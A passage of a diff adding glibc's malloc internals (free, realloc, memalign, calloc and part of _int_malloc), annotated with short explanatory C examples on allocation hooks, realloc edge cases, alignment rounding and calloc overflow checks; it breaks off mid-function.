+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
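
__libc_malloc consults __malloc_hook before doing anything else, which is also why the hook is such a common overwrite target in heap exploitation material. A benign use is allocation tracing; the sketch below follows the classic glibc manual pattern and assumes one of the pre-2.34 libcs in this repo (the hook variables are deprecated and were removed later):

#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>

static void *(*old_malloc_hook) (size_t, const void *);

static void *
trace_malloc_hook (size_t size, const void *caller)
{
  void *result;

  /* Restore the previous hook so the nested malloc does not recurse.  */
  __malloc_hook = old_malloc_hook;
  result = malloc (size);
  fprintf (stderr, "malloc (%zu) from %p returns %p\n", size, caller, result);

  /* Re-arm our hook.  */
  old_malloc_hook = __malloc_hook;
  __malloc_hook = trace_malloc_hook;
  return result;
}

int main (void)
{
  old_malloc_hook = __malloc_hook;
  __malloc_hook = trace_malloc_hook;

  void *p = malloc (32);
  free (p);
  return 0;
}
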
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
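
Two edge cases handled at the top of __libc_realloc are worth spelling out: realloc (NULL, n) is routed to __libc_malloc, and since REALLOC_ZERO_BYTES_FREES defaults to 1 in glibc, realloc (p, 0) frees p and returns NULL. A small sketch (illustration only, not part of this file):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main (void)
{
  /* realloc of NULL behaves exactly like malloc.  */
  char *p = realloc (NULL, 16);
  strcpy (p, "hello");

  /* Growing may move the block; the old contents are copied over.  */
  p = realloc (p, 4096);
  printf ("still says: %s\n", p);

  /* With REALLOC_ZERO_BYTES_FREES this frees the block and returns NULL,
     so p must not be used afterwards.  */
  p = realloc (p, 0);
  printf ("realloc (p, 0) = %p\n", (void *) p);
  return 0;
}
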
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
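
One easy-to-miss detail of _mid_memalign above: a non-power-of-two alignment is not rejected, it is silently rounded up to the next power of two. A short sketch, assuming a 64-bit build where MALLOC_ALIGNMENT is 16:

#include <malloc.h>
#include <stdint.h>
#include <stdio.h>

int main (void)
{
  /* 48 is not a power of two; per _mid_memalign it becomes 64.  */
  void *p = memalign (48, 100);
  printf ("%p mod 64 = %lu\n", p, (unsigned long) ((uintptr_t) p % 64));
  free (p);
  return 0;
}
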
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing is not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
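
The HALF_INTERNAL_SIZE_T test above is what lets calloc reject an n * elem_size product that wraps around, something a hand-written malloc (n * elem_size) silently misses. A standalone sketch of the difference (the chosen n makes the product wrap to zero in size_t arithmetic):

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

int main (void)
{
  /* 2^(bits/2): n * n wraps around to 0 in size_t arithmetic.  */
  size_t n = (size_t) 1 << (8 * sizeof (size_t) / 2);

  void *p = calloc (n, n);   /* overflow detected: NULL with ENOMEM */
  printf ("calloc (n, n)  = %p, errno = %d\n", p, errno);

  void *q = malloc (n * n);  /* n * n == 0: a minimum-size chunk comes back */
  printf ("malloc (n * n) = %p\n", q);

  free (q);
  return 0;
}
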
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
